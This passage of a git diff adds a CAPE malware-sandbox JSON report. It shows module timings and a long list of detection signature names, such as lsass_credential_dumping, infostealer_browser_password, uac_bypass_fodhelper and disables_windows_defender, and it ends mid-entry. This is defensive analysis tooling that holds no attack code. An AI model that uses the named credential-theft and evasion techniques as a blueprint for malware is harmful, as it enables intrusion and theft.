diff --git "a/2bb81b2a4d73eb41d28af6f70f575e85.json" "b/2bb81b2a4d73eb41d28af6f70f575e85.json" new file mode 100644--- /dev/null +++ "b/2bb81b2a4d73eb41d28af6f70f575e85.json" @@ -0,0 +1,80594 @@ +{ + "statistics": { + "processing": [ + { + "name": "CAPE", + "time": 2.907 + }, + { + "name": "AnalysisInfo", + "time": 0.004 + }, + { + "name": "BehaviorAnalysis", + "time": 0.044 + }, + { + "name": "Debug", + "time": 0.001 + }, + { + "name": "NetworkAnalysis", + "time": 0.0 + }, + { + "name": "Suricata", + "time": 0.0 + }, + { + "name": "UrlAnalysis", + "time": 0.0 + }, + { + "name": "script_log_processing", + "time": 0.0 + }, + { + "name": "ProcessMemory", + "time": 0.0 + } + ], + "signatures": [ + { + "name": "packer_themida", + "time": 0.0 + }, + { + "name": "stealth_network", + "time": 0.0 + }, + { + "name": "disable_driver_via_blocklist", + "time": 0.0 + }, + { + "name": "disable_driver_via_hvcidisallowedimages", + "time": 0.0 + }, + { + "name": "disable_hypervisor_protected_code_integrity", + "time": 0.0 + }, + { + "name": "pendingfilerenameoperations_Operations", + "time": 0.0 + }, + { + "name": "anomalous_deletefile", + "time": 0.0 + }, + { + "name": "antiav_360_libs", + "time": 0.0 + }, + { + "name": "antiav_ahnlab_libs", + "time": 0.0 + }, + { + "name": "antiav_avast_libs", + "time": 0.0 + }, + { + "name": "antiav_bitdefender_libs", + "time": 0.0 + }, + { + "name": "antiav_bullgaurd_libs", + "time": 0.0 + }, + { + "name": "antiav_emsisoft_libs", + "time": 0.0 + }, + { + "name": "antiav_qurb_libs", + "time": 0.0 + }, + { + "name": "antiav_servicestop", + "time": 0.0 + }, + { + "name": "antiav_apioverride_libs", + "time": 0.0 + }, + { + "name": "antidebug_guardpages", + "time": 0.0 + }, + { + "name": "antidebug_ntcreatethreadex", + "time": 0.0 + }, + { + "name": "antiav_nthookengine_libs", + "time": 0.0 + }, + { + "name": "antidebug_outputdebugstring", + "time": 0.0 + }, + { + "name": "antidebug_setunhandledexceptionfilter", + "time": 0.0 + }, + { + "name": "antidebug_windows", + "time": 0.0 + }, + { + "name": "antisandbox_cuckoo", + "time": 0.0 + }, + { + "name": "antisandbox_cuckoocrash", + "time": 0.0 + }, + { + "name": "antisandbox_foregroundwindows", + "time": 0.0 + }, + { + "name": "antisandbox_mouse_hook", + "time": 0.0 + }, + { + "name": "antisandbox_sboxie_libs", + "time": 0.0 + }, + { + "name": "antisandbox_script_timer", + "time": 0.0 + }, + { + "name": "antisandbox_sleep", + "time": 0.0 + }, + { + "name": "antisandbox_sunbelt_libs", + "time": 0.0 + }, + { + "name": "antisandbox_unhook", + "time": 0.0 + }, + { + "name": "antivm_directory_objects", + "time": 0.0 + }, + { + "name": "antivm_generic_disk", + "time": 0.0 + }, + { + "name": "antivm_generic_scsi", + "time": 0.0 + }, + { + "name": "antivm_generic_services", + "time": 0.0 + }, + { + "name": "antivm_generic_system", + "time": 0.0 + }, + { + "name": "antivm_checks_available_memory", + "time": 0.0 + }, + { + "name": "detect_virtualization_via_recent_files", + "time": 0.0 + }, + { + "name": "antivm_vbox_libs", + "time": 0.0 + }, + { + "name": "antivm_vbox_window", + "time": 0.0 + }, + { + "name": "antivm_vmware_events", + "time": 0.0 + }, + { + "name": "antivm_vmware_libs", + "time": 0.0 + }, + { + "name": "api_spamming", + "time": 0.0 + }, + { + "name": "api_uuidfromstringa", + "time": 0.0 + }, + { + "name": "bcdedit_command", + "time": 0.0 + }, + { + "name": "bootkit", + "time": 0.0 + }, + { + "name": "potential_overwrite_mbr", + "time": 0.0 + }, + { + "name": "suspicious_ioctl_scsipassthough", + "time": 0.0 + }, + { + "name": "browser_needed", + "time": 0.0 + }, + { + "name": "regsvr32_squiblydoo_dll_load", + "time": 0.0 + }, + { + "name": "uac_bypass_cmstp", + "time": 0.0 + }, + { + "name": "uac_bypass_eventvwr", + "time": 0.0 + }, + { + "name": "uac_bypass_windows_Backup", + "time": 0.0 + }, + { + "name": "dotnet_code_compile", + "time": 0.0 + }, + { + "name": "creates_largekey", + "time": 0.0 + }, + { + "name": "creates_nullvalue", + "time": 0.0 + }, + { + "name": "access_windows_passwords_vault", + "time": 0.0 + }, + { + "name": "dump_lsa_via_windows_error_reporting", + "time": 0.0 + }, + { + "name": "lsass_credential_dumping", + "time": 0.0 + }, + { + "name": "critical_process", + "time": 0.0 + }, + { + "name": "generates_crypto_key", + "time": 0.0 + }, + { + "name": "cryptopool_domains", + "time": 0.0 + }, + { + "name": "dead_connect", + "time": 0.0 + }, + { + "name": "dead_link", + "time": 0.0 + }, + { + "name": "decoy_document", + "time": 0.0 + }, + { + "name": "decoy_image", + "time": 0.0 + }, + { + "name": "deletes_consolehost_history", + "time": 0.0 + }, + { + "name": "dep_bypass", + "time": 0.0 + }, + { + "name": "dep_disable", + "time": 0.0 + }, + { + "name": "disables_wfp", + "time": 0.0 + }, + { + "name": "add_windows_defender_exclusions", + "time": 0.0 + }, + { + "name": "dll_load_uncommon_file_types", + "time": 0.0 + }, + { + "name": "document_script_exe_drop", + "time": 0.0 + }, + { + "name": "guloader_apis", + "time": 0.0 + }, + { + "name": "driver_load", + "time": 0.0 + }, + { + "name": "dynamic_function_loading", + "time": 0.0 + }, + { + "name": "encrypted_ioc", + "time": 0.0 + }, + { + "name": "exec_crash", + "time": 0.0 + }, + { + "name": "process_creation_suspicious_location", + "time": 0.0 + }, + { + "name": "exploit_getbasekerneladdress", + "time": 0.0 + }, + { + "name": "exploit_gethaldispatchtable", + "time": 0.0 + }, + { + "name": "exploit_heapspray", + "time": 0.0 + }, + { + "name": "koadic_apis", + "time": 0.0 + }, + { + "name": "koadic_network_activity", + "time": 0.0 + }, + { + "name": "downloads_from_filehosting", + "time": 0.0 + }, + { + "name": "generic_phish", + "time": 0.0 + }, + { + "name": "http_request", + "time": 0.0 + }, + { + "name": "infostealer_browser", + "time": 0.0 + }, + { + "name": "infostealer_browser_password", + "time": 0.0 + }, + { + "name": "infostealer_cookies", + "time": 0.0 + }, + { + "name": "cryptbot_network", + "time": 0.0 + }, + { + "name": "infostealer_keylog", + "time": 0.0 + }, + { + "name": "masslogger_artifacts", + "time": 0.0 + }, + { + "name": "purplewave_network_activity", + "time": 0.0 + }, + { + "name": "quilclipper_behavior", + "time": 0.0 + }, + { + "name": "raccoon_behavior", + "time": 0.0 + }, + { + "name": "captures_screenshot", + "time": 0.0 + }, + { + "name": "vidar_behavior", + "time": 0.0 + }, + { + "name": "injection_createremotethread", + "time": 0.0 + }, + { + "name": "injection_explorer", + "time": 0.0 + }, + { + "name": "injection_network_traffic", + "time": 0.0 + }, + { + "name": "injection_runpe", + "time": 0.0 + }, + { + "name": "injection_rwx", + "time": 0.0 + }, + { + "name": "injection_themeinitapihook", + "time": 0.0 + }, + { + "name": "resumethread_remote_process", + "time": 0.0 + }, + { + "name": "internet_dropper", + "time": 0.0 + }, + { + "name": "escalate_privilege_via_named_pipe", + "time": 0.0 + }, + { + "name": "ipc_namedpipe", + "time": 0.0 + }, + { + "name": "js_phish", + "time": 0.0 + }, + { + "name": "js_suspicious_redirect", + "time": 0.0 + }, + { + "name": "execute_binary_via_internet_explorer_exporter", + "time": 0.0 + }, + { + "name": "execute_binary_via_run_exe_helper_utility", + "time": 0.0 + }, + { + "name": "execute_ps_via_syncappvpublishingserver", + "time": 0.0 + }, + { + "name": "malicious_dynamic_function_loading", + "time": 0.0 + }, + { + "name": "encrypt_pcinfo", + "time": 0.0 + }, + { + "name": "encrypt_data_agenttesla_http", + "time": 0.0 + }, + { + "name": "encrypt_data_agentteslat2_http", + "time": 0.0 + }, + { + "name": "encrypt_data_nanocore", + "time": 0.0 + }, + { + "name": "mimics_agent", + "time": 0.0 + }, + { + "name": "mimics_filetime", + "time": 0.0 + }, + { + "name": "amsi_bypass_via_com_registry", + "time": 0.0 + }, + { + "name": "access_auto_logons_via_registry", + "time": 0.0 + }, + { + "name": "access_boot_key_via_registry", + "time": 0.0 + }, + { + "name": "create_suspicious_lnk_files", + "time": 0.0 + }, + { + "name": "credential_access_via_windows_credential_history", + "time": 0.0 + }, + { + "name": "dll_hijacking_via_microsoft_exchange", + "time": 0.0 + }, + { + "name": "dll_hijacking_via_waas_medic_svc_com_typelib", + "time": 0.0 + }, + { + "name": "execute_file_downloaded_via_openssh", + "time": 0.0 + }, + { + "name": "execute_safe_mode_from_suspicious_process", + "time": 0.0 + }, + { + "name": "execute_scripts_via_microsoft_management_console", + "time": 0.0 + }, + { + "name": "execute_suspicious_processes_via_windows_mssql_service", + "time": 0.0 + }, + { + "name": "execution_from_self_extracting_archive", + "time": 0.0 + }, + { + "name": "ip_address_discovery_via_trusted_program", + "time": 0.0 + }, + { + "name": "load_dll_via_control_panel", + "time": 0.0 + }, + { + "name": "network_connection_via_suspicious_process", + "time": 0.0 + }, + { + "name": "potential_location_discovery_via_unusual_process", + "time": 0.0 + }, + { + "name": "store_executable_registry", + "time": 0.0 + }, + { + "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent", + "time": 0.0 + }, + { + "name": "suspicious_java_execution_via_win_scripts", + "time": 0.0 + }, + { + "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File", + "time": 0.0 + }, + { + "name": "uses_restart_manager_for_suspicious_activities", + "time": 0.0 + }, + { + "name": "modify_desktop_wallpaper", + "time": 0.0 + }, + { + "name": "modify_zoneid_ads", + "time": 0.0 + }, + { + "name": "move_file_on_reboot", + "time": 0.0 + }, + { + "name": "multiple_useragents", + "time": 0.0 + }, + { + "name": "network_anomaly", + "time": 0.0 + }, + { + "name": "network_bind", + "time": 0.0 + }, + { + "name": "network_cnc_https_archive", + "time": 0.0 + }, + { + "name": "network_cnc_https_free_webshoting", + "time": 0.0 + }, + { + "name": "network_cnc_https_generic", + "time": 0.0 + }, + { + "name": "network_cnc_https_temp_urldns", + "time": 0.0 + }, + { + "name": "network_cnc_https_opensource", + "time": 0.0 + }, + { + "name": "network_cnc_https_pastesite", + "time": 0.0 + }, + { + "name": "network_cnc_https_payload", + "time": 0.0 + }, + { + "name": "network_cnc_https_serviceinterface", + "time": 0.0 + }, + { + "name": "network_cnc_https_socialmedia", + "time": 0.0 + }, + { + "name": "network_cnc_https_telegram", + "time": 0.0 + }, + { + "name": "network_cnc_https_tempstorage", + "time": 0.0 + }, + { + "name": "network_cnc_https_urlshortener", + "time": 0.0 + }, + { + "name": "network_cnc_https_useragent", + "time": 0.0 + }, + { + "name": "network_cnc_smtps_exfil", + "time": 0.0 + }, + { + "name": "network_cnc_smtps_generic", + "time": 0.0 + }, + { + "name": "network_dns_idn", + "time": 0.0 + }, + { + "name": "network_dns_suspicious_querytype", + "time": 0.0 + }, + { + "name": "network_dns_tunneling_request", + "time": 0.0 + }, + { + "name": "network_document_http", + "time": 0.0 + }, + { + "name": "explorer_http", + "time": 0.0 + }, + { + "name": "network_fake_useragent", + "time": 0.0 + }, + { + "name": "legitimate_domain_abuse", + "time": 0.0 + }, + { + "name": "network_document_file", + "time": 0.0 + }, + { + "name": "network_tor", + "time": 0.0 + }, + { + "name": "office_com_load", + "time": 0.0 + }, + { + "name": "office_dotnet_load", + "time": 0.0 + }, + { + "name": "office_mshtml_load", + "time": 0.0 + }, + { + "name": "office_vb_load", + "time": 0.0 + }, + { + "name": "office_wmi_load", + "time": 0.0 + }, + { + "name": "office_cve2017_11882", + "time": 0.0 + }, + { + "name": "office_cve2017_11882_network", + "time": 0.0 + }, + { + "name": "office_cve_2021_40444", + "time": 0.0 + }, + { + "name": "office_cve_2021_40444_m2", + "time": 0.0 + }, + { + "name": "office_flash_load", + "time": 0.0 + }, + { + "name": "office_postscript", + "time": 0.0 + }, + { + "name": "office_suspicious_processes", + "time": 0.0 + }, + { + "name": "office_write_exe", + "time": 0.0 + }, + { + "name": "persistence_via_autodial_dll_registry", + "time": 0.0 + }, + { + "name": "persistence_autorun", + "time": 0.0 + }, + { + "name": "persistence_autorun_tasks", + "time": 0.0 + }, + { + "name": "persistence_bootexecute", + "time": 0.0 + }, + { + "name": "persistence_registry_script", + "time": 0.0 + }, + { + "name": "powershell_network_connection", + "time": 0.0 + }, + { + "name": "powershell_download", + "time": 0.0 + }, + { + "name": "powershell_request", + "time": 0.0 + }, + { + "name": "createtoolhelp32snapshot_module_enumeration", + "time": 0.0 + }, + { + "name": "enumerates_running_processes", + "time": 0.0 + }, + { + "name": "process_interest", + "time": 0.0 + }, + { + "name": "process_needed", + "time": 0.0 + }, + { + "name": "mass_data_encryption", + "time": 0.0 + }, + { + "name": "ransomware_file_modifications", + "time": 0.0 + }, + { + "name": "nemty_network_activity", + "time": 0.0 + }, + { + "name": "nemty_note", + "time": 0.0 + }, + { + "name": "sodinokibi_behavior", + "time": 0.0 + }, + { + "name": "stop_ransomware_registry", + "time": 0.0 + }, + { + "name": "blackrat_apis", + "time": 0.0 + }, + { + "name": "blackrat_network_activity", + "time": 0.0 + }, + { + "name": "blackrat_registry_keys", + "time": 0.0 + }, + { + "name": "dcrat_behavior", + "time": 0.0 + }, + { + "name": "karagany_system_event_objects", + "time": 0.0 + }, + { + "name": "rat_luminosity", + "time": 0.0 + }, + { + "name": "rat_nanocore", + "time": 0.0 + }, + { + "name": "netwire_behavior", + "time": 0.0 + }, + { + "name": "obliquerat_network_activity", + "time": 0.0 + }, + { + "name": "orcusrat_behavior", + "time": 0.0 + }, + { + "name": "trochilusrat_apis", + "time": 0.0 + }, + { + "name": "reads_self", + "time": 0.0 + }, + { + "name": "recon_beacon", + "time": 0.0 + }, + { + "name": "recon_programs", + "time": 0.0 + }, + { + "name": "recon_systeminfo", + "time": 0.0 + }, + { + "name": "accesses_recyclebin", + "time": 0.0 + }, + { + "name": "remcos_shell_code_dynamic_wrapper_x", + "time": 0.0 + }, + { + "name": "script_created_process", + "time": 0.0 + }, + { + "name": "script_network_activity", + "time": 0.0 + }, + { + "name": "suspicious_js_script", + "time": 0.0 + }, + { + "name": "javascript_timer", + "time": 0.0 + }, + { + "name": "secure_login_phishing", + "time": 0.0 + }, + { + "name": "securityxploded_modules", + "time": 0.0 + }, + { + "name": "get_clipboard_data", + "time": 0.0 + }, + { + "name": "sets_autoconfig_url", + "time": 0.0 + }, + { + "name": "spoofs_procname", + "time": 0.0 + }, + { + "name": "stack_pivot", + "time": 0.0 + }, + { + "name": "stack_pivot_file_created", + "time": 0.0 + }, + { + "name": "stack_pivot_process_create", + "time": 0.0 + }, + { + "name": "set_clipboard_data", + "time": 0.0 + }, + { + "name": "stealth_childproc", + "time": 0.0 + }, + { + "name": "stealth_file", + "time": 0.0 + }, + { + "name": "stealth_timeout", + "time": 0.0 + }, + { + "name": "stealth_window", + "time": 0.0 + }, + { + "name": "queries_keyboard_layout", + "time": 0.0 + }, + { + "name": "terminates_remote_process", + "time": 0.0 + }, + { + "name": "user_enum", + "time": 0.0 + }, + { + "name": "virus", + "time": 0.0 + }, + { + "name": "neshta_files", + "time": 0.0 + }, + { + "name": "neshta_regkeys", + "time": 0.0 + }, + { + "name": "webmail_phish", + "time": 0.0 + }, + { + "name": "persists_dev_util", + "time": 0.0 + }, + { + "name": "spawns_dev_util", + "time": 0.0 + }, + { + "name": "alters_windows_utility", + "time": 0.0 + }, + { + "name": "overwrites_accessibility_utility", + "time": 0.0 + }, + { + "name": "Potential_Lateral_Movement_Via_SMBEXEC", + "time": 0.0 + }, + { + "name": "potential_WebShell_Via_ScreenConnectServer", + "time": 0.0 + }, + { + "name": "uses_Microsoft_HTML_Help_Executable", + "time": 0.0 + }, + { + "name": "wiper_zeroedbytes", + "time": 0.0 + }, + { + "name": "wmi_create_process", + "time": 0.0 + }, + { + "name": "wmi_script_process", + "time": 0.0 + }, + { + "name": "deletes_files", + "time": 0.0 + }, + { + "name": "drops_files", + "time": 0.0 + }, + { + "name": "reads_files", + "time": 0.0 + }, + { + "name": "writes_files", + "time": 0.0 + }, + { + "name": "antianalysis_tls_section", + "time": 0.0 + }, + { + "name": "antivirus_clamav", + "time": 0.0 + }, + { + "name": "antivirus_virustotal", + "time": 0.0 + }, + { + "name": "bad_certs", + "time": 0.0 + }, + { + "name": "bad_ssl_certs", + "time": 0.0 + }, + { + "name": "banker_zeus_p2p", + "time": 0.0 + }, + { + "name": "banker_zeus_url", + "time": 0.0 + }, + { + "name": "binary_yara", + "time": 0.0 + }, + { + "name": "bot_athenahttp", + "time": 0.0 + }, + { + "name": "bot_dirtjumper", + "time": 0.0 + }, + { + "name": "bot_drive", + "time": 0.0 + }, + { + "name": "bot_drive2", + "time": 0.0 + }, + { + "name": "bot_madness", + "time": 0.0 + }, + { + "name": "family_proxyback", + "time": 0.0 + }, + { + "name": "flare_capa_antianalysis", + "time": 0.0 + }, + { + "name": "flare_capa_collection", + "time": 0.0 + }, + { + "name": "flare_capa_communication", + "time": 0.0 + }, + { + "name": "flare_capa_compiler", + "time": 0.0 + }, + { + "name": "flare_capa_datamanipulation", + "time": 0.0 + }, + { + "name": "flare_capa_executable", + "time": 0.0 + }, + { + "name": "flare_capa_hostinteraction", + "time": 0.0 + }, + { + "name": "flare_capa_impact", + "time": 0.0 + }, + { + "name": "flare_capa_lib", + "time": 0.0 + }, + { + "name": "flare_capa_linking", + "time": 0.0 + }, + { + "name": "flare_capa_loadcode", + "time": 0.0 + }, + { + "name": "flare_capa_malwarefamily", + "time": 0.0 + }, + { + "name": "flare_capa_nursery", + "time": 0.0 + }, + { + "name": "flare_capa_persistence", + "time": 0.0 + }, + { + "name": "flare_capa_runtime", + "time": 0.0 + }, + { + "name": "flare_capa_targeting", + "time": 0.0 + }, + { + "name": "log4shell", + "time": 0.0 + }, + { + "name": "mimics_extension", + "time": 0.0 + }, + { + "name": "network_country_distribution", + "time": 0.0 + }, + { + "name": "network_cnc_http", + "time": 0.0 + }, + { + "name": "network_ip_exe", + "time": 0.0 + }, + { + "name": "network_dga", + "time": 0.0 + }, + { + "name": "network_dga_fraunhofer", + "time": 0.0 + }, + { + "name": "network_dyndns", + "time": 0.0 + }, + { + "name": "network_excessive_udp", + "time": 0.0 + }, + { + "name": "network_http", + "time": 0.0 + }, + { + "name": "network_icmp", + "time": 0.0 + }, + { + "name": "network_irc", + "time": 0.0 + }, + { + "name": "network_open_proxy", + "time": 0.0 + }, + { + "name": "network_questionable_http_path", + "time": 0.0 + }, + { + "name": "network_questionable_https_path", + "time": 0.0 + }, + { + "name": "network_smtp", + "time": 0.0 + }, + { + "name": "network_torgateway", + "time": 0.0 + }, + { + "name": "origin_langid", + "time": 0.0 + }, + { + "name": "origin_resource_langid", + "time": 0.0 + }, + { + "name": "overlay", + "time": 0.0 + }, + { + "name": "packer_unknown_pe_section_name", + "time": 0.0 + }, + { + "name": "packer_aspack", + "time": 0.0 + }, + { + "name": "packer_aspirecrypt", + "time": 0.0 + }, + { + "name": "packer_bedsprotector", + "time": 0.0 + }, + { + "name": "packer_confuser", + "time": 0.0 + }, + { + "name": "packer_enigma", + "time": 0.0 + }, + { + "name": "packer_entropy", + "time": 0.0 + }, + { + "name": "packer_mpress", + "time": 0.0 + }, + { + "name": "packer_nate", + "time": 0.0 + }, + { + "name": "packer_nspack", + "time": 0.0 + }, + { + "name": "packer_smartassembly", + "time": 0.0 + }, + { + "name": "packer_spices", + "time": 0.0 + }, + { + "name": "packer_themida", + "time": 0.0 + }, + { + "name": "packer_titan", + "time": 0.0 + }, + { + "name": "packer_upx", + "time": 0.0 + }, + { + "name": "packer_vmprotect", + "time": 0.0 + }, + { + "name": "packer_yoda", + "time": 0.0 + }, + { + "name": "pdf_annot_urls_checker", + "time": 0.0 + }, + { + "name": "polymorphic", + "time": 0.0 + }, + { + "name": "punch_plus_plus_pcres", + "time": 0.0 + }, + { + "name": "procmem_yara", + "time": 0.0 + }, + { + "name": "recon_checkip", + "time": 0.0 + }, + { + "name": "static_authenticode", + "time": 0.0 + }, + { + "name": "invalid_authenticode_signature", + "time": 0.0 + }, + { + "name": "static_dotnet_anomaly", + "time": 0.0 + }, + { + "name": "static_java", + "time": 0.0 + }, + { + "name": "static_pdf", + "time": 0.0 + }, + { + "name": "static_pe_anomaly", + "time": 0.0 + }, + { + "name": "pe_compile_timestomping", + "time": 0.0 + }, + { + "name": "static_pe_pdbpath", + "time": 0.0 + }, + { + "name": "static_rat_config", + "time": 0.0 + }, + { + "name": "static_versioninfo_anomaly", + "time": 0.0 + }, + { + "name": "suricata_alert", + "time": 0.0 + }, + { + "name": "suspicious_html_body", + "time": 0.0 + }, + { + "name": "suspicious_html_name", + "time": 0.0 + }, + { + "name": "suspicious_html_title", + "time": 0.0 + }, + { + "name": "volatility_devicetree_1", + "time": 0.0 + }, + { + "name": "volatility_handles_1", + "time": 0.0 + }, + { + "name": "volatility_ldrmodules_1", + "time": 0.0 + }, + { + "name": "volatility_ldrmodules_2", + "time": 0.0 + }, + { + "name": "volatility_malfind_1", + "time": 0.0 + }, + { + "name": "volatility_malfind_2", + "time": 0.0 + }, + { + "name": "volatility_modscan_1", + "time": 0.0 + }, + { + "name": "volatility_svcscan_1", + "time": 0.0 + }, + { + "name": "volatility_svcscan_2", + "time": 0.0 + }, + { + "name": "volatility_svcscan_3", + "time": 0.0 + }, + { + "name": "whois_create", + "time": 0.0 + }, + { + "name": "accesses_mailslot", + "time": 0.0 + }, + { + "name": "accesses_netlogon_regkey", + "time": 0.0 + }, + { + "name": "accesses_public_folder", + "time": 0.0 + }, + { + "name": "accesses_sysvol", + "time": 0.0 + }, + { + "name": "writes_sysvol", + "time": 0.0 + }, + { + "name": "adds_admin_user", + "time": 0.0 + }, + { + "name": "adds_user", + "time": 0.0 + }, + { + "name": "overwrites_admin_password", + "time": 0.0 + }, + { + "name": "antianalysis_detectfile", + "time": 0.001 + }, + { + "name": "antianalysis_detectreg", + "time": 0.001 + }, + { + "name": "modify_attachment_manager", + "time": 0.0 + }, + { + "name": "antiav_detectfile", + "time": 0.001 + }, + { + "name": "antiav_detectreg", + "time": 0.004 + }, + { + "name": "antiav_srp", + "time": 0.0 + }, + { + "name": "antiav_whitespace", + "time": 0.0 + }, + { + "name": "antidebug_devices", + "time": 0.0 + }, + { + "name": "antiemu_windefend", + "time": 0.0 + }, + { + "name": "antiemu_wine_reg", + "time": 0.0 + }, + { + "name": "antisandbox_cuckoo_files", + "time": 0.0 + }, + { + "name": "antisandbox_fortinet_files", + "time": 0.0 + }, + { + "name": "antisandbox_joe_anubis_files", + "time": 0.0 + }, + { + "name": "antisandbox_sboxie_mutex", + "time": 0.0 + }, + { + "name": "antisandbox_sunbelt_files", + "time": 0.0 + }, + { + "name": "antisandbox_threattrack_files", + "time": 0.0 + }, + { + "name": "antivm_bochs_keys", + "time": 0.0 + }, + { + "name": "antivm_generic_bios", + "time": 0.0 + }, + { + "name": "antivm_generic_diskreg", + "time": 0.0 + }, + { + "name": "antivm_hyperv_keys", + "time": 0.0 + }, + { + "name": "antivm_parallels_keys", + "time": 0.0 + }, + { + "name": "antivm_vbox_devices", + "time": 0.0 + }, + { + "name": "antivm_vbox_files", + "time": 0.0 + }, + { + "name": "antivm_vbox_keys", + "time": 0.0 + }, + { + "name": "antivm_vmware_devices", + "time": 0.0 + }, + { + "name": "antivm_vmware_files", + "time": 0.0 + }, + { + "name": "antivm_vmware_keys", + "time": 0.0 + }, + { + "name": "antivm_vmware_mutexes", + "time": 0.0 + }, + { + "name": "antivm_vpc_files", + "time": 0.0 + }, + { + "name": "antivm_vpc_keys", + "time": 0.0 + }, + { + "name": "antivm_vpc_mutex", + "time": 0.0 + }, + { + "name": "antivm_xen_keys", + "time": 0.0 + }, + { + "name": "asyncrat_mutex", + "time": 0.0 + }, + { + "name": "gulpix_behavior", + "time": 0.0 + }, + { + "name": "ketrican_regkeys", + "time": 0.0 + }, + { + "name": "okrum_mutexes", + "time": 0.0 + }, + { + "name": "banker_cridex", + "time": 0.0 + }, + { + "name": "geodo_banking_trojan", + "time": 0.0 + }, + { + "name": "banker_spyeye_mutexes", + "time": 0.0 + }, + { + "name": "banker_zeus_mutex", + "time": 0.0 + }, + { + "name": "bitcoin_opencl", + "time": 0.0 + }, + { + "name": "accesses_primary_patition", + "time": 0.0 + }, + { + "name": "direct_hdd_access", + "time": 0.0 + }, + { + "name": "enumerates_physical_drives", + "time": 0.0 + }, + { + "name": "physical_drive_access", + "time": 0.0 + }, + { + "name": "bot_russkill", + "time": 0.0 + }, + { + "name": "browser_addon", + "time": 0.0 + }, + { + "name": "chromium_browser_extension_directory", + "time": 0.0 + }, + { + "name": "browser_helper_object", + "time": 0.0 + }, + { + "name": "browser_security", + "time": 0.0 + }, + { + "name": "browser_startpage", + "time": 0.0 + }, + { + "name": "ie_disables_process_tab", + "time": 0.0 + }, + { + "name": "odbcconf_bypass", + "time": 0.0 + }, + { + "name": "squiblydoo_bypass", + "time": 0.0 + }, + { + "name": "squiblytwo_bypass", + "time": 0.0 + }, + { + "name": "bypass_firewall", + "time": 0.0 + }, + { + "name": "checks_uac_status", + "time": 0.0 + }, + { + "name": "uac_bypass_cmstpcom", + "time": 0.0 + }, + { + "name": "uac_bypass_delegateexecute_sdclt", + "time": 0.0 + }, + { + "name": "uac_bypass_fodhelper", + "time": 0.0 + }, + { + "name": "cape_extracted_content", + "time": 0.0 + }, + { + "name": "carberp_mutex", + "time": 0.0 + }, + { + "name": "clears_logs", + "time": 0.0 + }, + { + "name": "cmdline_obfuscation", + "time": 0.0 + }, + { + "name": "cmdline_switches", + "time": 0.0 + }, + { + "name": "cmdline_terminate", + "time": 0.0 + }, + { + "name": "cmdline_forfiles_wildcard", + "time": 0.0 + }, + { + "name": "cmdline_http_link", + "time": 0.0 + }, + { + "name": "cmdline_long_string", + "time": 0.0 + }, + { + "name": "cmdline_reversed_http_link", + "time": 0.0 + }, + { + "name": "long_commandline", + "time": 0.0 + }, + { + "name": "powershell_renamed_commandline", + "time": 0.0 + }, + { + "name": "copies_self", + "time": 0.0 + }, + { + "name": "credwiz_credentialaccess", + "time": 0.0 + }, + { + "name": "enables_wdigest", + "time": 0.0 + }, + { + "name": "vaultcmd_credentialaccess", + "time": 0.0 + }, + { + "name": "file_credential_store_access", + "time": 0.0 + }, + { + "name": "file_credential_store_write", + "time": 0.0 + }, + { + "name": "kerberos_credential_access_via_rubeus", + "time": 0.0 + }, + { + "name": "registry_credential_dumping", + "time": 0.0 + }, + { + "name": "registry_credential_store_access", + "time": 0.0 + }, + { + "name": "registry_lsa_secrets_access", + "time": 0.0 + }, + { + "name": "comsvcs_credentialdump", + "time": 0.0 + }, + { + "name": "cryptomining_stratum_command", + "time": 0.0 + }, + { + "name": "cypherit_mutexes", + "time": 0.0 + }, + { + "name": "darkcomet_regkeys", + "time": 0.0 + }, + { + "name": "datop_loader", + "time": 0.0 + }, + { + "name": "deepfreeze_mutex", + "time": 0.0 + }, + { + "name": "deletes_executed_files", + "time": 0.0 + }, + { + "name": "disables_app_launch", + "time": 0.0 + }, + { + "name": "disables_auto_app_termination", + "time": 0.0 + }, + { + "name": "disables_appv_virtualization", + "time": 0.0 + }, + { + "name": "disables_backups", + "time": 0.0 + }, + { + "name": "disables_browser_warn", + "time": 0.0 + }, + { + "name": "disables_context_menus", + "time": 0.0 + }, + { + "name": "disables_cpl_disable", + "time": 0.0 + }, + { + "name": "disables_crashdumps", + "time": 0.0 + }, + { + "name": "disables_event_logging", + "time": 0.0 + }, + { + "name": "disables_folder_options", + "time": 0.0 + }, + { + "name": "disables_notificationcenter", + "time": 0.0 + }, + { + "name": "disables_power_options", + "time": 0.0 + }, + { + "name": "disables_restore_default_state", + "time": 0.0 + }, + { + "name": "disables_run_command", + "time": 0.0 + }, + { + "name": "disables_smartscreen", + "time": 0.0 + }, + { + "name": "disables_startmenu_search", + "time": 0.0 + }, + { + "name": "disables_system_restore", + "time": 0.0 + }, + { + "name": "disables_uac", + "time": 0.0 + }, + { + "name": "disables_wer", + "time": 0.0 + }, + { + "name": "disables_windows_defender", + "time": 0.0 + }, + { + "name": "disables_windows_defender_logging", + "time": 0.0 + }, + { + "name": "removes_windows_defender_contextmenu", + "time": 0.0 + }, + { + "name": "windows_defender_powershell", + "time": 0.0 + }, + { + "name": "disables_windows_file_protection", + "time": 0.0 + }, + { + "name": "disables_windowsupdate", + "time": 0.0 + }, + { + "name": "disables_winfirewall", + "time": 0.0 + }, + { + "name": "adfind_domain_enumeration", + "time": 0.0 + }, + { + "name": "domain_enumeration_commands", + "time": 0.0 + }, + { + "name": "andromut_mutexes", + "time": 0.0 + }, + { + "name": "downloader_cabby", + "time": 0.0 + }, + { + "name": "phorpiex_mutexes", + "time": 0.0 + }, + { + "name": "protonbot_mutexes", + "time": 0.0 + }, + { + "name": "driver_filtermanager", + "time": 0.0 + }, + { + "name": "dropper", + "time": 0.0 + }, + { + "name": "dll_archive_execution", + "time": 0.0 + }, + { + "name": "lnk_archive_execution", + "time": 0.0 + }, + { + "name": "script_archive_execution", + "time": 0.0 + }, + { + "name": "excel4_macro_urls", + "time": 0.0 + }, + { + "name": "escalate_privilege_via_ntlm_relay", + "time": 0.0 + }, + { + "name": "spooler_access", + "time": 0.0 + }, + { + "name": "spooler_svc_start", + "time": 0.0 + }, + { + "name": "mapped_drives_uac", + "time": 0.0 + }, + { + "name": "hides_recycle_bin_icon", + "time": 0.0 + }, + { + "name": "apocalypse_stealer_file_behavior", + "time": 0.0 + }, + { + "name": "arkei_files", + "time": 0.0 + }, + { + "name": "azorult_mutexes", + "time": 0.0 + }, + { + "name": "infostealer_bitcoin", + "time": 0.001 + }, + { + "name": "cryptbot_files", + "time": 0.0 + }, + { + "name": "echelon_files", + "time": 0.0 + }, + { + "name": "infostealer_ftp", + "time": 0.002 + }, + { + "name": 